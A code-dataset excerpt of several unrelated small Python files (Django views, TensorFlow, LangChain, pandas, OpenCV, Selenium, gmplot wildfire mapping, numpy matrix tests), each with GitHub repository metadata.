self.rx_sensitivity\n\n\tdef get_frequency(self):\n\t\t\"\"\"\n\t\tGet the radio frequency\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters\n\t\t\n\t\tReturns\n\t\t-------\n\t\tdouble number\n\t\t\tThe current configured receiver sensitivity\n\t\t\"\"\"\n\t\treturn self.frequency\n\t\n\tdef get_activity(self):\n\t\t\"\"\"\n\t\tGet the sensor activity status\n\t\t\n\t\tParameters\n\t\t----------\n\t\tNo parameters\n\t\t\n\t\tReturns\n\t\t-------\n\t\tinteger number\n\t\t\tThe current sensor activity status: 0 -> inactive, 1 -> active\n\t\t\"\"\"\n\t\treturn self.activity\n\t\t\n\tdef __iter__(self):\n\t\t\"\"\"Interator\"\"\"\n\t\treturn self\n\n\tdef __next__(self):\n\t\tposition = self._update_position()\n\t\tenergy = self._update_energy()\n\t\tactivity = self._update_activity()\n\t\treturn position, energy, activity\n\n\n\n","repo_name":"edielsonpf/wsn-toolkit","sub_path":"wsntk/network/_sensor.py","file_name":"_sensor.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74802241843","text":"from django import forms\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse_lazy, reverse\nfrom django.views.generic import FormView, ListView, CreateView, UpdateView, DeleteView, DetailView\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.conf import settings\nfrom django.db import transaction\n\n# specific to this view\nfrom common.models import CmnPaymentMethods\nfrom common.sysutil import get_sequenceval\nfrom common.table_gen import formfilter_queryset, general_exclude_list\nfrom common.moduleattributes.table_fields import CMN_PAYMENT_METHODS\n\nMODEL = CmnPaymentMethods\nPK_NAME = MODEL._meta.pk.name\nnon_editable_list = [field.name for field in MODEL._meta.fields if not field.editable]\n\nexclude_list = general_exclude_list + non_editable_list\n\nform_field_list = [field for field in CMN_PAYMENT_METHODS['fields'] if field not in exclude_list]\n\nform_field_dict = {x[0]: x[1] for x in list(zip(CMN_PAYMENT_METHODS['fields'], CMN_PAYMENT_METHODS['headers'])) if\n x[0] in form_field_list}\n\n\nclass PaymentMethodForm(forms.ModelForm):\n class Meta:\n model = MODEL\n fields = form_field_list\n labels = form_field_dict\n\n def __init__(self, *args, **kwargs):\n super(PaymentMethodForm, self).__init__(*args, **kwargs)\n for field in MODEL._meta.fields:\n if field.name in form_field_list and field.name not in []:\n if field.get_internal_type() == 'CharField':\n self.fields[field.name].widget.attrs.update({'style': 'text-transform:uppercase'})\n\n def clean(self):\n self._validate_unique = True\n for field in MODEL._meta.fields:\n if field.name in form_field_list and field.name not in []:\n if field.get_internal_type() == 'CharField':\n self.cleaned_data[field.name] = self.cleaned_data[field.name].upper()\n return self.cleaned_data\n\n\nclass DetailForm(forms.ModelForm):\n class Meta:\n model = MODEL\n fields = '__all__'\n widgets = {x: forms.TextInput(attrs={'readonly': True, }) for x in form_field_list}\n\n\nAPPNAME = 'setup'\nURLPREFIX = '/' + APPNAME + '/paymentmethods{0}/'\nSLUG_FIELD = PK_NAME\nSLUG_URL_KWARG = PK_NAME\nTEMPLATE_PREFIX = 'payment_methods/paymentmethods-{0}.html'\nORDERING = (PK_NAME,)\nFORM_CLASS = PaymentMethodForm\nREC_IN_PAGE = settings.PUB_PAGE_LINES\nREVERSE = \"setup:paymentmethods_list\"\nMYCONTEXT = {'create': URLPREFIX.format('_create'),\n 'update': URLPREFIX.format('_update'),\n 'delete': URLPREFIX.format('_delete'),\n 'list': URLPREFIX.format('_list'),\n 'title': 'Payment Methods',\n }\nsearch_field_list = ['pmnt_code', 'pmnt_method',]\nlistview_filed_list = ['sl_no','pmnt_code','pmnt_method']\nlistview_filed_dict = {x[0]: x[1] for x in list(zip(CMN_PAYMENT_METHODS['fields'], CMN_PAYMENT_METHODS['headers'])) if\n all([x[0] in form_field_list, x[0] not in ['validation_criteria', ]])}\n\n\nclass SearchForm(forms.ModelForm):\n class Meta:\n model = MODEL\n fields = search_field_list\n labels = form_field_dict\n widgets = {x: forms.TextInput(attrs={'required': False, }) for x in search_field_list}\n\n def __init__(self, *args, **kwargs):\n super(SearchForm, self).__init__(*args, **kwargs)\n for field in search_field_list:\n self.fields[field].required = False\n\n\n@method_decorator(login_required, name='dispatch')\nclass PaymentMethodsListView(ListView):\n model = MODEL\n template_name = TEMPLATE_PREFIX.format('l')\n # context_object_name = 'data'\n ordering = (PK_NAME,)\n paginate_by = REC_IN_PAGE\n\n def get_context_data(self, **kwargs):\n context = super(PaymentMethodsListView, self).get_context_data(**kwargs)\n print('CONTEXT - START --->',context)\n print('self.request.GET --->', self.request.GET)\n context['listview_filed_dict'] = listview_filed_dict\n methods_list = CmnPaymentMethods.objects.all().order_by(PK_NAME)\n\n # context['search_field_dict'] = {x: {'label': form_field_dict[x], 'value': ''} for x in search_field_list}\n context['search_form'] = SearchForm()\n if 'list_filter' in self.request.GET:\n methods_list = formfilter_queryset(self.request.GET, methods_list, search_field_list)\n context['search_form'] = SearchForm(self.request.GET)\n\n if len(methods_list)==1:\n context['details'] = DetailForm(instance=methods_list[0])\n elif self.request.GET.get('paymentmethod_id'):\n print('paymentmethod_id -->', self.request.GET.get('paymentmethod_id'))\n methods_list = CmnPaymentMethods.objects.filter(pmnt_method_id=self.request.GET.get('paymentmethod_id'))\n context['details'] = DetailForm(instance=methods_list[0])\n\n if len(methods_list)>REC_IN_PAGE:\n page = self.request.GET.get('page')\n paginator = Paginator(methods_list, self.paginate_by)\n try:\n methods_list = paginator.page(page)\n except PageNotAnInteger:\n methods_list = paginator.page(1)\n except EmptyPage:\n methods_list = paginator.page(paginator.num_pages)\n\n context['methods_list'] = methods_list\n context['request'] = self.request\n context['MYCONTEXT'] = MYCONTEXT\n print('CONTEXT - END --->', context)\n return context\n\n\n@method_decorator(login_required, name='dispatch')\nclass PaymentMethodsCreateView(CreateView):\n model = MODEL\n form_class = FORM_CLASS\n template_name = TEMPLATE_PREFIX.format('c')\n\n def form_valid(self, form):\n self.object = form.save(commit=False)\n self.object.pmnt_method_id = get_sequenceval('cmn_payment_methods_s.nextval')\n self.object.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse(REVERSE)\n\n\n@method_decorator(login_required, name='dispatch')\nclass PaymentMethodsUpdateView(UpdateView):\n model = MODEL\n form_class = FORM_CLASS\n template_name = TEMPLATE_PREFIX.format('u')\n slug_field = PK_NAME\n slug_url_kwarg = PK_NAME\n\n def get_success_url(self):\n return reverse(REVERSE)\n\n\n@method_decorator(login_required, name='dispatch')\nclass PaymentMethodsDeleteView(DeleteView):\n model = MODEL\n form_class = FORM_CLASS\n template_name = TEMPLATE_PREFIX.format('d')\n slug_field = PK_NAME\n slug_url_kwarg = PK_NAME\n\n def get_success_url(self):\n return reverse(REVERSE)","repo_name":"ashokpanigrahi88/datahubpython","sub_path":"setup/templates/payment_methods/payment_method_views.py","file_name":"payment_method_views.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34457352433","text":"#!/usr/bin/env python3\n\"\"\"\ncreates the training operation for a neural network\nin tensorflow using the Adam optimization algorithm\n\"\"\"\nimport tensorflow as tf\n\n\ndef create_Adam_op(loss, alpha, beta1, beta2, epsilon):\n \"\"\"\n @loss is the loss of the network\n @alpha is the learning rate\n @beta1 is the weight used for the first moment\n @beta2 is the weight used for the second moment\n @epsilon is a small number to avoid division by zero\n Returns: the Adam optimization operation\n \"\"\"\n # Create global step variable\n global_step = tf.Variable(0, trainable=False)\n\n # Define Adam optimizer with given hyperparameters\n optimizer = tf.train.AdamOptimizer(learning_rate=alpha, beta1=beta1,\n beta2=beta2, epsilon=epsilon)\n\n # Compute gradients and apply them using the Adam optimizer\n grads_and_vars = optimizer.compute_gradients(loss)\n train_op = optimizer.apply_gradients(grads_and_vars,\n global_step=global_step)\n\n return train_op\n","repo_name":"Facundoblanco10/holbertonschool-machine_learning","sub_path":"supervised_learning/optimization/10-Adam.py","file_name":"10-Adam.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32129595896","text":"from langchain.chains import LLMChain, SequentialChain\nfrom langchain.prompts import PromptTemplate\n\nfrom langchain_poc.examples.langchain.base import BaseExample\n\n\nclass SequentialChainExample(BaseExample):\n story_template = \"\"\"\n As a children's book writer, please come up with a simple and short (90 words)\n lullaby based on the location {location}\n and the main character {name}\n\n STORY:\n \"\"\"\n\n translation_template = \"\"\"\n Translate the {story} into {language}. Make sure the language is simple and fun.\n \n TRANSLATION:\n \"\"\"\n\n def run_example(self) -> None:\n self.chat_model.temperature = 0.5\n\n story_chain = self._make_story_chain()\n translated_story = self._make_translate_story_chain()\n\n overall_chain = SequentialChain(\n chains=[story_chain, translated_story],\n input_variables=[\"location\", \"name\", \"language\"],\n output_variables=[\"story\", \"translated\"],\n )\n response = overall_chain(\n inputs={\n \"location\": \"Ukraine\",\n \"name\": \"Ira\",\n \"language\": \"Ukrainian\",\n }\n )\n print(f\"Overall Chain response: {response}\")\n\n print(f\"Story Chain Output: {response['story']}\")\n print(f\"Translation Chain Output: {response['translated']}\")\n\n def _make_story_chain(self) -> LLMChain:\n story_prompt_template = PromptTemplate(\n input_variables=[\"location\", \"name\"],\n template=self.story_template,\n )\n return LLMChain(\n llm=self.chat_model,\n prompt=story_prompt_template,\n output_key=\"story\", # uses in SequentialChain(..., output_variables=[\"story\"])\n verbose=True,\n )\n\n def _make_translate_story_chain(self) -> LLMChain:\n translation_prompt_template = PromptTemplate(\n input_variables=[\"story\", \"language\"], template=self.translation_template\n )\n return LLMChain(\n llm=self.chat_model,\n prompt=translation_prompt_template,\n output_key=\"translated\",\n verbose=True,\n )\n","repo_name":"ZaslavkyDi/langchain-poc","sub_path":"langchain_poc/examples/langchain/chains/sequential_chain.py","file_name":"sequential_chain.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10542060909","text":"import os\n\nimport pandas as pd\n\nimport src.read.base_reader as reader\n\n\"\"\"\nReading message log file and extract text or put them in pandas data frame\n\"\"\"\n\n\nclass PandasRead(reader.Read):\n\n def __init__(self, filepath, file_type=\"csv\", sep=\",\", header=0):\n \"\"\"\n :param filepath:\n :param type: optional filetype, to keep track of different types of files\n :param sep: optional separator, to extract columns\n :param header: optional header, from the file\n \"\"\"\n self._types = {\"csv\": self._read_csv, \"txt\": self._read_csv}\n self._filepath = filepath\n self._type = file_type\n self._sep = sep\n self._header = header\n if not os.path.isfile(filepath):\n raise FileNotFoundError(\n \"Most likely you passed the wrong file path: {filepath} while creating Read instance\".format(\n filepath=filepath))\n assert file_type in self._types\n self._df = self._types[self._type](self._filepath, self._sep, self._header)\n\n def data_frame(self):\n \"\"\"\n :return: dataframe which was populated when this class initialized\n \"\"\"\n return self._df\n\n def text(self, text_column):\n \"\"\"\n :param text_column: of the dataframe\n :return: array of the text messages\n \"\"\"\n df = self._df\n if text_column in df.columns:\n return \"\\n\".join(df[text_column].values)\n\n def _read_csv(self, filepath, sep, header):\n \"\"\"\n Helper private function to read to dataframe from csv\n :param filepath:\n :param sep:\n :param header:\n :return: pandas dataframe\n \"\"\"\n return pd.read_csv(filepath, sep=sep, header=header)\n","repo_name":"nikhilkhandelwal/stackoverflow-topic-classifier-okc","sub_path":"src/read/pandas_reader.py","file_name":"pandas_reader.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"44965240323","text":"# importing required libraries of opencv\nimport cv2\n#import matplotlib.pyplot as plt\n# reads an input image\nimg = cv2.imread('ex2.jpg',1)\n\n\ndef invert(image,name):\n for i in range(0, len(img)):\n for j in range(0,len(img[1])):\n for k in range(0,3):\n img[i,j,k] = 255 - img[i,j,k]\n\n cv2.imwrite('inv.jpg', img)\n\n\ndef brilho(image,name, val):\n for i in range(0, len(img)):\n for j in range(0,len(img[1])):\n #for k in range(0,3):\n img[i,j] = img[i,j] + val\n\n cv2.imwrite('bri.jpg', img)\n\nbrilho(img,'ex2.jpg', 40)\n#histr = cv2.calcHist([img],[0],None,[256],[0,256])\n\n\n#plt.plot(histr)\n#plt.show()\n","repo_name":"LuskaSaur/arvoree","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72907806643","text":"import asyncio\nimport logging\nfrom config.zoneConfig import userConfig\nfrom datawrapper.dataBaseMgr import classDataBaseMgr\nfrom datawrapper.sqlBaseMgr import classSqlBaseMgr\nfrom lib.jsonhelp import classJsonDump\n\n\nfrom gmweb.utils.models import Base\ntbl = Base.metadata.tables[\"dj_repair\"]\n\n\n@asyncio.coroutine\ndef doCheck():\n engine = classSqlBaseMgr.getInstance().getEngine()\n\n with (yield from engine) as conn:\n # 检查写入信息\n var_aio_redis = classDataBaseMgr.getInstance().dictAioRedis[userConfig].objAioRedis\n\n try:\n new_repair_list = yield from classDataBaseMgr.getInstance().getRepairDataNewList(var_aio_redis)\n\n if len(new_repair_list) <= 0:\n pass\n else:\n for var_id in new_repair_list:\n try:\n if var_id is None:\n logging.info(repr(\"无新消息\"))\n continue\n\n yield from flushInsertToDb(var_id.decode(), conn)\n\n yield from classDataBaseMgr.getInstance().removeRepairDataNew(var_aio_redis, var_id)\n\n logging.info(\"Save new repair[{}]\".format(var_id))\n except Exception as e:\n logging.error(\"Save new repair exception, account=[{}], error=[{}]\".format(var_id, str(e)))\n\n except Exception as e:\n logging.error(str(e))\n finally:\n pass\n\n # 检查更新信息\n try:\n\n dirty_repair_list = yield from classDataBaseMgr.getInstance().getRepairDataDirtyList(var_aio_redis)\n\n if len(dirty_repair_list) <= 0:\n pass\n else:\n for var_id in dirty_repair_list:\n try:\n if var_id is None:\n logging.info(\"Id为空\")\n continue\n\n yield from flushUpdateToDb(var_id.decode(), conn)\n\n yield from classDataBaseMgr.getInstance().removeRepairDataKeyDirtyList(var_aio_redis, var_id)\n\n logging.info(\"Save dirty repair[{}]\".format(var_id))\n except Exception as e:\n logging.error(\"Save dirty repair exception, account=[{}], error=[{}]\".format(var_id, str(e)))\n\n except Exception as e:\n logging.error(str(e))\n finally:\n pass\n\n\n#########################\n@asyncio.coroutine\ndef flushInsertToDb(repairId: str, conn):\n # TODO 还需要完善dataBaseMgr中的接口\n\n objRepair = yield from classDataBaseMgr.getInstance().getOneRepairData(repairId)\n\n if objRepair is None:\n # TODO log\n return\n\n sql = tbl.insert().values(\n repairId=objRepair.strRepairId,\n create_time=objRepair.iTime,\n start_time=objRepair.iStartTime,\n end_time=objRepair.iEndTime,\n repairFlag=objRepair.iRepairFlag,\n accountId=objRepair.strAccountId,\n platform=objRepair.iPlatform\n )\n\n trans = yield from conn.begin()\n try:\n yield from conn.execute(sql)\n except Exception as e:\n logging.error(e)\n yield from trans.rollback()\n raise e\n else:\n yield from trans.commit()\n\n\n@asyncio.coroutine\ndef flushUpdateToDb(repairId: str, conn):\n # TODO 还需要完善dataBaseMgr中的接口\n\n objRepair = yield from classDataBaseMgr.getInstance().getOneRepairData(repairId)\n\n if objRepair is None:\n # TODO log\n logging.info(\"消息为空\")\n return\n\n sql = tbl.update().where(tbl.c.repairId == objRepair.strRepairId).values(\n repairId=objRepair.strRepairId,\n create_time=objRepair.iTime,\n start_time=objRepair.iStartTime,\n end_time=objRepair.iEndTime,\n repairFlag=objRepair.iRepairFlag,\n accountId=objRepair.strAccountId,\n platform=objRepair.iPlatform\n )\n trans = yield from conn.begin()\n try:\n yield from conn.execute(sql)\n except Exception as e:\n logging.exception(e)\n yield from trans.rollback()\n raise e\n else:\n yield from trans.commit()\n","repo_name":"evrimulgen/probet-1","sub_path":"probet/server/dbsvr/logic/repair_flush.py","file_name":"repair_flush.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11305689961","text":"from selenium import webdriver\r\nimport os\r\nfrom time import sleep\r\nco=webdriver.ChromeOptions()\r\nprefs={\"download.default_directory\":r\"E:\\下载\"}\r\nco.add_experimental_option('prefs',prefs)\r\ndriver=webdriver.Chrome(options=co)\r\ndriver.implicitly_wait(10)\r\ndriver.maximize_window()\r\ndriver.get(\"http://pypi.Python.org/pypi/selenium\")\r\ndriver.find_element_by_css_selector('#files-tab').click()\r\nsleep(2)\r\ndriver.find_element_by_css_selector('#files > table > tbody > tr:nth-child(1) > th > a').click()\r\nsleep(30)\r\ndriver.quit()\r\n","repo_name":"chenzizhou/python","sub_path":"python_script/test/downfile.py","file_name":"downfile.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72426016561","text":"#coding=utf-8\nimport json\nimport openpyxl\nimport sys\nimport os\n\nbase_path = os.getcwd()\nexcel_path = os.path.join(base_path, \"asset\", \"AppleID.xlsx\")\n\nclass HandExcel:\n def load_excel(self):\n open_excel = openpyxl.load_workbook(excel_path)\n return open_excel\n def get_sheet_data(self,index=None):\n sheet_name = self.load_excel().sheetnames\n if index == None:\n index = 0\n data = self.load_excel()[sheet_name[index]]\n return data\n def get_cell_value(self,row,cols):\n \"获取某个单元格的内容\"\n value = self.get_sheet_data().cell(row=row,column=cols).value\n return value\n def get_row(self):\n '''获取行数'''\n row = self.get_sheet_data().max_row\n return row\n def get_row_value(self,row):\n '''获取一整行数据'''\n row_list =[]\n for i in self.get_sheet_data()[row]:\n row_list.append(i.value)\n return row_list\n def excel_write_data(self,row,cols,value):\n wb = self.load_excel()\n wr = wb.active\n wr.cell(row,cols,value)\n wb.save(excel_path)\n\n def get_columns_value(self,key=None):\n '''获取某一列的数据'''\n column_list = []\n if key ==None:\n key ='A'\n column_list_data = self.get_sheet_data()[key]\n for i in column_list_data:\n column_list.append(i.value)\n return column_list\n\n def get_rows_number(self,case_id):\n '''获取行号'''\n num = 1\n cols_data = self.get_columns_value()\n for col_data in cols_data:\n if case_id == col_data:\n return num\n num = num +1\n return num\n\n def get_excel_data(self):\n '''获取excel里面所有的数据'''\n data_list = []\n for i in range(self.get_row()):\n data_list.append(self.get_row_value(i+2))\n return data_list\n\n\nif __name__ ==\"__main__\":\n handexcel = HandExcel()\n print(handexcel.get_excel_data())","repo_name":"Tech-Chao/UnlockApple","sub_path":"handle_excel.py","file_name":"handle_excel.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"18207713559","text":"'''\n***********************************\nAuthor: Pranav Surampudi\nDate: 8 August 2018\nEncoding: utf-8\n***********************************\n'''\ndef apply_to_each(list_val, function):\n \"\"\"return the absolute value of the list elements\"\"\"\n ans = []\n for j in list_val:\n ans.append(function(j))\n print(ans)\ndef main():\n \"\"\"Main Function\"\"\"\n data = input()\n data = data.split()\n list1 = []\n for j in data:\n list1.append(int(j))\n apply_to_each(list1, abs)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Pranav-20186017/CSPP1","sub_path":"CSPP1-Practice/CSPP1-Assignments/M9/Functions and Objects Exercise-1/functions_and_objects_1.py","file_name":"functions_and_objects_1.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16178119175","text":"import numpy as np\nimport pandas as pd\n\ndef collapsemax(group, collapsecolumn='Lambda'):\n \"\"\"Collapse to maximum along column\"\"\" \n index = group[collapsecolumn].idxmax()\n return pd.Series({column : group[column].loc[index] for column in group.columns})\n\ndef printunique(df, nunique=1, returnnonunique=False):\n if returnnonunique:\n nonuniquecolumns = []\n for key in sorted(df.columns):\n uniques = df[key].unique()\n if len(uniques) == 1:\n print('{0}: {1}'.format(key, uniques[0]))\n elif len(uniques) <= nunique:\n print('{0}: {1}'.format(key, '; '.join(str(s) for s in uniques)))\n elif returnnonunique:\n nonuniquecolumns.append(key)\n if returnnonunique:\n return nonuniquecolumns\n\ndef intelligent_describe(df, **kwargs): \n ukwargs = dict(returnnonunique=kwargs.get('returnnonunique', True),\n nunique=kwargs.get('nunique', 1))\n print('-----------------------------------------------------')\n print('values of columns with no more than {0} unique entries'.format(ukwargs['nunique']))\n print('')\n nonuniquecolumns = printunique(df, **ukwargs)\n print('-----------------------------------------------------')\n print('summary statistics of other columns')\n print('')\n dkwargs = dict(include=kwargs.get('include', None),\n exclude=kwargs.get('exclude', None),\n percentiles=kwargs.get('percentiles', None))\n print(df[nonuniquecolumns].describe(**dkwargs))\n print('-----------------------------------------------------')\n\ndef flatten(l):\n return [item for sublist in l for item in sublist]\n\ndef loadnpz(filename):\n \"\"\"Load a npz file as a pandas DataFrame\"\"\"\n f = np.load(filename)\n df = pd.DataFrame(f['data'], columns=f['columns'])\n df = df.apply(pd.to_numeric, errors='ignore')\n df.sort_values(list(df.columns), inplace=True)\n return df\n","repo_name":"andim/transitions-paper","sub_path":"lib/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29849116275","text":"import base64#解码或者编码二进制\nimport io\nimport dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nimport pandas as pd\n\napp = dash.Dash(__name__)\napp.layout=html.Div([\n dcc.Upload(\n id='upload-data',\n children=html.Div([\n 'Drag and Drop or ',\n html.A('Select Files')\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n },\n ),\n html.Div(id='output-data-upload'),\n])\n\n@app.callback(Output('output-data-upload', 'children'),\n [Input('upload-data', 'contents')])\ndef parse_contents(contents):\n if not contents is None:#很重要要不页面会出错\n decoded = base64.b64decode(contents.split(\",\")[1])\n df=pd.read_table(io.StringIO(decoded.decode('utf-8')),sep=\"\\t\",header=0)\n return dash_table.DataTable(\n data=df.to_dict('records'),\n columns=[{'name': i, 'id': i} for i in df.columns]\n )\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)","repo_name":"fanyucai1/Dash_learn","sub_path":"Upload_tsv2table.py","file_name":"Upload_tsv2table.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13716271517","text":"from __future__ import print_function\n\n\"\"\"Single file templater\n\nThis program takes a single file as input and uses the built-in string format\nmethod to replace the occurence of brace-enclosed variables by values given on\nthe command-line.\n\"\"\"\n\n__author__ = \"Pierre de Buyl \"\n__version__ = \"0.1\"\n\n\ndef main():\n import sys\n import argparse\n\n desc = \"\"\"Generic templater\n Replaces occurences of the form {variable} by the value of the command-line\n argument \"--variable value\". Single character variables may use a single\n dash. The output is to standard out.\n\n Example:\n %s template.txt --name perl\n\n Will transform \"The name is {name}\" into \"The name is perl\" in the output.\n \"\"\" % (sys.argv[0],)\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter, description=desc)\n parser.add_argument('template_file', type=str, help='template file')\n parser.add_argument('args', nargs=argparse.REMAINDER,\n help=('List of variables to replace in the template '\n 'file of the form --variable value or -x value'))\n args = parser.parse_args()\n\n EMPTY = 0\n INUSE = 1\n\n # Parse the content of args.args\n state = EMPTY\n values = {}\n for a in args.args:\n if state == EMPTY:\n if len(a) > 2 and a.startswith('--'):\n key = a[2:]\n state = INUSE\n continue\n elif len(a) == 2 and a.startswith('-'):\n key = a[1:]\n state = INUSE\n continue\n else:\n raise ValueError('Invalid argument')\n if state == INUSE:\n values[key] = a\n state = EMPTY\n\n if state == INUSE:\n print(\"Command-line variable %s incomplete\" % key, file=sys.stderr)\n sys.exit(0)\n\n tmpl = open(args.template_file, 'r').read()\n\n try:\n print(tmpl.format(**values), end='')\n except KeyError:\n for l in tmpl.splitlines():\n try:\n l.format(**values)\n except KeyError as e:\n print(\"Variable %s is not defined\" % e, file=sys.stderr)\n\nif __name__ == '__main__':\n main()\n","repo_name":"pdebuyl/sftmpl","sub_path":"sftmpl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"8338028169","text":"import gmplot\nfrom math import asin, atan2, cos, degrees, radians, sin\nfrom weather import get_wind_dir, get_wind_bft\nimport os\nimport webbrowser\n\n\n# FUNCTIONS\n\ndef get_point_at_distance(lat1, lon1, d, bearing, R=6371):\n \"\"\"\n lat: initial latitude, in degrees\n lon: initial longitude, in degrees\n d: target distance from initial\n bearing: (true) heading in degrees\n R: optional radius of sphere, defaults to mean radius of earth\n\n Returns new lat/lon coordinate {d}km from initial, in degrees\n \"\"\"\n lat1 = radians(lat1)\n lon1 = radians(lon1)\n a = radians(bearing)\n lat2 = asin(sin(lat1) * cos(d/R) + cos(lat1) * sin(d/R) * cos(a))\n lon2 = lon1 + atan2(\n sin(a) * sin(d/R) * cos(lat1),\n cos(d/R) - sin(lat1) * sin(lat2)\n )\n return (degrees(lat2), degrees(lon2),)\n\ndef heatmap(api_key,lat,lon,fire_geo=None,fire_station=None,weights=None):\n \"\"\"\n api_key: key for OpenWeatherMap\n lat: initial latitude\n lon: initial longitude\n fire_geo: list object with tupel of lat and long of fire spots\n weight: list object with same size like fire_geo, includes fire intensity of the spot. Default None\n\n Returns a map with current fire as heatpoints\n \"\"\"\n # LOCATION\n map = gmplot.GoogleMapPlotter(lat, lon, 14.5) \n map.apikey = \"XXX\"\n\n # FIRE SPOTS\n #add heatmap\n if fire_geo != None:\n lats, longs = zip(*fire_geo)\n \n map.heatmap(lats, longs,radius=20, weights= weights)\n path = fire_geo + fire_station\n path_lats, path_longs = zip(*path)\n map.plot(path_lats, path_longs, \"cornflowerblue\", edge_width=3.0)\n fire_lat, fire_lon = zip(*fire_station)\n \n map.scatter(fire_lat, fire_lon, marker=True,size=100,color='red', label='Firestation')\n\n #WIND\n #add Scatter in Wind direction\n scatter = []\n #add Scatter in color of Wind speed green is low and red is high\n wind_speed = []\n wind_color = {0: 'lightgreen', 1: 'forestgreen', 2: 'deepskyblue', 3: 'royalblue', 4: 'navy',\n 5: 'blueviolet', 6: 'indigo', 7: 'purple', 8: 'darkmagenta', 9: 'crimson', 10: 'red', \n 11: 'darkred', 12: 'maroon'}\n #loop over fire spots\n for n in fire_geo:\n #get wind degree from weather script\n wind = get_wind_dir(api_key,n[0], n[1])\n #get wind speed in bft from weather script\n bft = get_wind_bft(api_key,n[0], n[1])\n #append speed to list\n wind_speed.append(bft)\n #get centre of the scatter \n lat, lon = get_point_at_distance(n[0], n[1],0.05,wind)\n #append each center point to list\n scatter.append((lat,lon))\n #unzip to add it to gmplot.scatter soon \n slats, slongs = zip(*scatter)\n #get wind colors from dictonary\n colors = [wind_color[x] for x in wind_speed]\n #plot scatters\n map.scatter(slats, slongs, colors, marker=False, symbol='o', size= 100, alpha=0.4)\n #map.text(lat, lon + 0.02, 'Wind:' + str(set([wind_type[x] for x in wind_speed])))\n #plot whole map\n map.draw( \"fire.html\" )\n\n# TESTING\n# Loerrach:\n\n# loe_lat = 47.6169\n# loe_lon = 7.6709\n# fire_geo = [\n# (47.6170, 7.6709), (47.6270, 7.6710), (47.6188, 7.6709),\n# (47.6169, 7.6758)]\n\n\n# heatmap(loe_lat,loe_lon,fire_geo)\n\n# Freiburg:\n\n# fr_lat = 47.997791\n# fr_lon = 7.842609\n# fire_spots = [\n# (47.998891, 7.842609), (47.994791, 7.843609)]\n\n# heatmap(fr_lat,fr_lon,fire_spots)","repo_name":"baechlja/Wildfires","sub_path":"map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73998418483","text":"import pytest\n\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom scipy import linalg, sparse\n\nfrom xesn.matrix import RandomMatrix, SparseRandomMatrix\n\nclass TestMatrix:\n n_rows = 10\n n_cols = 10\n factor = 1.0\n normalization = \"multiply\"\n random_seed = 0\n\n\n# --- Test distributions from both Dense and Sparse matrices\n@pytest.mark.parametrize(\n \"distribution, error\",\n [\n (\"uniform\", None),\n (\"gaussian\", None),\n (\"normal\", None),\n (\"gamma\", NotImplementedError),\n ],\n)\nclass TestDist(TestMatrix):\n\n RM = RandomMatrix\n\n @property\n def kw(self):\n return {key: getattr(self, key) for key in [\"n_rows\", \"n_cols\", \"factor\", \"normalization\", \"random_seed\"]}\n\n def test_dist(self, distribution, error):\n\n if error is None:\n rm = self.RM(distribution=distribution, **self.kw)\n rm()\n\n else:\n with pytest.raises(error):\n self.RM(distribution=distribution, **self.kw)\n\n\nclass TestSparseDist(TestDist):\n \"\"\"This inherits and runs the distribution tests from above\"\"\"\n\n RM = SparseRandomMatrix\n format = \"csr\"\n density = 0.99\n\n @property\n def kw(self):\n return {key: getattr(self, key) for key in [\"n_rows\", \"n_cols\", \"factor\", \"normalization\", \"random_seed\", \"format\", \"density\"]}\n\n\n# --- Test normalization\n@pytest.mark.parametrize(\n \"distribution\",\n [ \"normal\", \"uniform\" 